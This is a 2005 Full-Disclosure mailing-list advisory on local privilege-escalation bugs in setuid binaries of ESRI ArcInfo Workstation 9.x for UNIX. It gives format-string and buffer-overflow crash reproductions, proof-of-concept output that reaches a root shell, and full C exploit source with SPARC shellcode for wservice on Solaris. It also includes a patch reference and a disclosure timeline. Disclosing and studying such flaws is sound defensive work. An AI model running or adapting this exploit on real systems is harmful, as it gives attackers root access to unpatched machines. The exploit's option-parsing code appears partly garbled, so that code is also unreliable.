------------------------------------------------------------------------
DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'
Author: Kevin Finisterre
Vendor: http://www.esri.com/, http://www.esri.com/software/arcgis/arcinfo/index.html
Product: 'ArcInfo Workstation for UNIX'
http://www.digitalmunition.com/DMA[2005-0425a].txt
On any given day, more than 1,000,000 people around the world use ESRI's GIS to improve the
way their organizations conduct business.
ESRI software is used by more than 300,000 organizations worldwide including most U.S. federal
agencies and national mapping agencies, 45 of the top 50 petroleum companies, all 50 U.S. state
health departments, most forestry companies, and many others in dozens of industries.
ESRI software is the standard in state and local government and is used by more than 24,000
state and local governments including Paris, France; Los Angeles, California, USA; Beijing, China;
and Kuwait City, Kuwait.
ESRI ArcGIS is an integrated collection of GIS software products for building a complete GIS.
ArcGIS enables users to deploy GIS functionality wherever it is needed in desktops, servers, or
custom applications; over the Web; or in the field.
Several local overflows and format string conditions have been found in the Unix versions of ESRI
ArcGIS products. ESRI Staff has promptly responded to and fixed the issues mentioned below. Patches
for ArcGIS 9.x will be available at the time this advisory is published.
(http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015)
Our testing was performed against ARCInfo Workstation 9 on two of ESRI's supported UNIX platforms.
We have currently only tested IRIX 6.5 and Solaris 10(beta). All UNIX ArcInfo installs are believed
to be impacted by these vulnerabilities. It is currently unknown how older versions of ArcGIS are
affected by these bugs. ESRI has stated that fixes for 8.x are forthcomming so I can only assume
exploitation is similar for this particlar version.
The vulnerable binaries can be found in <install path>/bin. The files are both setuid and setgid so
they should be easily found during a routine setuid scan using the unix find utility. I was not able to
exploit ALL of the binaries I found however it is likely that more vulns could be discovered.
10 setuid root binaries are provided with the install of ARCInfo
-bash-2.05b$ pwd
/export/home/arcgis/arcexe9x/bin
-bash-2.05b$ ls -al `find . -perm -4000 `
-rwsr-sr-x 1 root nuucp 56772 Mar 5 2004 ./abservice
-rwsr-sr-x 1 root nuucp 4601408 Mar 5 2004 ./arcrqmgr
-rwsr-sr-x 1 root nuucp 2311796 Mar 5 2004 ./asbuild
-rwsr-sr-x 1 root nuucp 2817120 Mar 5 2004 ./asmaster
-rwsr-sr-x 1 root nuucp 7988480 Mar 5 2004 ./asrecovery
-rwsr-sr-x 1 root nuucp 8240340 Mar 5 2004 ./asuser
-rwsr-sr-x 1 root nuucp 2765020 Mar 5 2004 ./asutility
-rwsr-sr-x 1 root nuucp 75904 Mar 5 2004 ./lockmgr
-rwsr-sr-x 1 root nuucp 5652228 Mar 5 2004 ./se
-rwsr-sr-x 1 root nuucp 81332 Mar 5 2004 ./wservice
station0 515# ls -al `find . -perm -4000`
-rwsr-sr-x 1 root lp 44648 Mar 9 2004 ./abservice
-rwsr-sr-x 1 root lp 5920592 Mar 9 2004 ./arcrqmgr
-rwsr-sr-x 1 root lp 2508552 Mar 9 2004 ./asbuild
-rwsr-sr-x 1 root lp 3263552 Mar 9 2004 ./asmaster
-rwsr-sr-x 1 root lp 9758516 Mar 9 2004 ./asrecovery
-rwsr-sr-x 1 root lp 10065284 Mar 9 2004 ./asuser
-rwsr-sr-x 1 root lp 3229812 Mar 9 2004 ./asutility
-rwsr-sr-x 1 root lp 83260 Mar 9 2004 ./lockmgr
-rwsr-sr-x 1 root lp 6926980 Mar 9 2004 ./se
-rwsr-sr-x 1 root lp 83180 Mar 9 2004 ./wservice
For some reason the binaries are setgid (9). On our SunOS and IRIX boxes
this group corresponed respectively with nuucp and lp.
Some of the vulnerabilities will require a properly working license and license manager
-bash-2.05b# export LM_LICENSE_FILE=/export/home/arcgis/arcexe9x/sysgen/license.dat
-bash-2.05b# ps -ef | grep lmgr | grep -v grep
root 1294 1 0 18:14:44 pts/3 0:00 ./lmgrd -c ./license.dat
during exploitation you may see license requests mixed in with the applciation responses.
A cursory audit of the above listed applications revealed the following
flaws.
Both lockmgr and wservice are vulnerable to a format string attack.
-bash-2.05b$ export
ARCHOME=AAAABBBB%x.%x.%x.%x
-bash-2.05b$ ./wservice
Can not find or access
AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run!
-bash-2.05b# export ARCHOME=%x.%x.%x.%x
-bash-2.05b# ./lockmgr
Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run!
asmaster is vulnerable to a buffer overflow attack
-bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b
FATAL ERROR
Segment Violation
-bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a
FATAL ERROR
Segment Violation
asutility has multiple overflows
-bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x
804'`
FATAL ERROR
Segment Violation
please note that asutility has several other overflows. Listing them all is a
bit redundant.
se is subject to a buffer overflow
-bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'`
FATAL ERROR
Segment Violation
asrecovery is subject to a buffer overflow
-bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a
FATAL ERROR
Segment Violation
In order to show that these issues do indeed pose a security risk we have created PoC for the
format string conditions in wservice and lockmgr. This exploit was tested on the solaris platform
however exploitation on other platforms should be trivial.
-bash-2.05b$ ./ex_ARC_wservice
Can not find or access
ZAAAAÿ>¢4BBBBÿ>¢67ffffc000002a0780009e39c00000615ff330c5cff330ba00000001000000001ff3033e8ff3ed86cffd
fffffff3ea9d8ffffff7fffbff4c0ff3be2bcffbff4c0ff3be2100000000000000000000000000000000000000007ff330c5
80000000100000007ff3ea9d8ff3ea1140000000010000000ff3ecc30ff3ea108ff3ea1a800c1004000000602ff3ea108000
00000ff330c580000060200c100c0ffbff618ff3cba180000000000000000000000000000000000000000000000000000000
00001b8cc0001273c000100000001b8ccff3ecbd000000002ffbff7f8ffbff7b400000000ff3ec4f800019de700000000000
100940000000000000000ff3ecbd00002a48000000020ff3b00006ffffffd000000000000000000000000000000000000001
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000900000000000000000000000000013db40000000041f7286533a121f0404919490000000041f7082825e36eb00000200
0000000a075667300000000000000000000000000000000000001179fff3ecc30ff33072800000016ff330a3c00000000000
00000ffffffffffffffffffffffffffffffffffffffffff3b000000000003ff3ea10800010034ffffffffffbff7acff3b000
043616e206e6f742066696e64206f7220616363657373205a000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000004141414100000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004
@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢
@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢
@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢@¢
@¢@¢@¢@ ÊÐ?@ ËÐ!
Ù !v#
Ý¢`yà;¿ø# Ð )Ð!
Ø !n#
ËÜ¢chà;¿ðÀ#¿ø# À#¿ìÐ#¿è# ?"
# id
uid=0(root) gid=0(root)
chmod -s the above mentioned setuid files or apply the patches supplyed by ESRI which can be located
at http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
This is basic timeline associated with this bug.
01/18/2005 assigned case #409658 Jeremy W takex ownership of the technical support incident
01/18/2005 Jeremy W logged this vulnerability as defect number CQ00261045
01/26/2005 Johnh exploited the a bug on solaris
--/--/---- Multiple communications involving the issues at hand over a several month period
04/11/2005 Bug patches provided to KF for testing
04/27/2005 Fixes have been tested and verified
04/30/2005 Public disclosure.
As mentioned above ESRI was very prompt in addressing and fixing the issues at hand. Since the
discovery of these bugs ESRI has attempted to proactively prevent future exploits from occuring.
-KF
------------------------------------------------------------------------
/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP "\xa2\x1c\x40\x11"
int iType;
struct
{
unsigned long retloc;
unsigned long retaddr;
char *type;
}targets[] =
{
/* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
0003a234 d thr_jmp_table
*/
{0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
{0x41424344,0x41424344,"DEBUG"},
},v;
//shellcode taken from netric
char shellcode[] =
"55"
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
// setreuid(0,0);
"\x90\x1d\x80\x16" // xor %l6, %l6, %o0
"\x92\x1d\x80\x16" // xor %l6, %l6, %o1
"\x82\x10\x20\xca" // mov 0xca, %g1
"\x91\xd0\x20\x08" // ta 8
"\x90\x1d\x80\x16" // xor %l6, %l6, %o0
"\x92\x1d\x80\x16" // xor %l6, %l6, %o1
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\xcb" // mov 0x2e, %g1
"\x91\xd0\x20\x08" // ta 8 [setregid(0,0)]
"\x21\x0b\xd9\x19" // sethi %hi(0x2f646400), %l0
"\xa0\x14\x21\x76" // or %l0, 0x176, %l0
"\x23\x0b\xdd\x1d" // sethi %hi(0x2f747400), %l1
"\xa2\x14\x60\x79" // or %l1, 0x79, %l1
"\xe0\x3b\xbf\xf8" // std %l0, [ %sp - 0x8 ]
"\x90\x23\xa0\x08" // sub %sp, 8, %o0
"\x92\x1b\x80\x0e" // xor %sp, %sp, %o1
"\x82\x10\x20\x05" // mov 0x05, %g1
"\x91\xd0\x20\x08" // ta 8 [open("/dev/tty",RD_ONLY)]
"\x90\x10\x20\x02" // mov 0x02, %o0
"\x82\x10\x20\x29" // mov 0x29, %g1
"\x91\xd0\x20\x08" // ta 8 [dup(2)]
"\x21\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l0
"\xa0\x14\x21\x6e" // or %l0, 0x16e, %l0
"\x23\x0b\xcb\xdc" // sethi %hi(0x2f2f7000), %l1
"\xa2\x14\x63\x68" // or %l1, 0x368, %l1
"\xe0\x3b\xbf\xf0" // std %l0, [ %sp - 0x10 ]
"\xc0\x23\xbf\xf8" // clr [ %sp - 0x8 ]
"\x90\x23\xa0\x10" // sub %sp, 0x10, %o0
"\xc0\x23\xbf\xec" // clr [ %sp - 0x14 ]
"\xd0\x23\xbf\xe8" // st %o0, [ %sp - 0x18 ]
"\x92\x23\xa0\x18" // sub %sp, 0x18, %o1
"\x94\x22\x80\x0a" // sub %o2, %o2, %o2
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x08" // ta 8 [execve("/bin/sh","/bin/sh",NULL)]
"\x82\x10\x20\x01" // mov 0x01, %g1
"\x91\xd0\x20\x08" // ta 8 [exit(?)]
"\x10\xbf\xff\xdf" // b shellcode
"\x90\x1d\x80\x16"; // or %o1, %o1, %o1
/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
*ptr++ = (char) (value >> 24) & 0xff;
*ptr++ = (char) (value >> 16) & 0xff;
*ptr++ = (char) (value >> 8) & 0xff;
*ptr++ = (char) (value >> 0) & 0xff;
return ptr;
}
/* main */
int main(int argc, char **argv)
{
unsigned long retaddr;
unsigned long retloc;
int offset = 23;
int dump_fmt=129;
int al = 1;
int i=0;
int x=0;
int c;
unsigned long hi,lo;
static unsigned long shift0,shift1;
char buf[9000];
char *args[24];
char *env[6];
char *ptr;
char padding[64];
char padding1[64];
char buf2[9000];
if (argc < 3) {
usage (argv[0]);
return -1;
}
while((c = getopt(argc, argv, "h:t:")) != EOF) {
switch(c) {
usage (argv[0]);
return 0;
iType = atoi (optarg);
break;
usage (argv[0]);
return 0;
}
}
if (argc < 2) { usage(argv[0]); exit(1); }
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return 0;
}
env[0] = shellcode;
env[1] = buf2;
env[2] = NULL;
args[0] = VULPROG;
args[1] = NULL;
retloc = targets[iType].retloc;
retaddr = targets[iType].retaddr;
hi = (retaddr >> 16) & 0xffff;
lo = (retaddr >> 0) & 0xffff;
shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
shift1 = (0x10000 + lo) - hi;
memset(buf,0x00,sizeof(buf));
memset(buf2,0x00,sizeof(buf2));
ptr = buf;
for (i = 0; i < al; i++) {
*ptr++ = 0x41;
}
ptr = putLong (ptr, 0x41414141);
ptr = putLong (ptr, retloc);
ptr = putLong (ptr, 0x42424242);
ptr = putLong (ptr, retloc+2);
for (i = 0 ; i < dump_fmt; i ++) {
memcpy(ptr, "%.8x", 4);
ptr = ptr + 4;
}
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift0);
strcat(ptr,"lx%hn");
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift1);
strcat(ptr,"lx%hn");
strcat(buf2,"ARCHOME=");
memcpy(buf2+strlen(buf2),buf,strlen(buf));
execve (args[0], args, env);
perror ("execve");
return 0;
}
int usage(char *p)
{
int i;
printf( "Arcgis local root format string exploit\r\n");
printf( "Usage: %s <-t target>\n",p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("%d\t%s\n", i, targets[i].type);
}
return 0;
}
------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/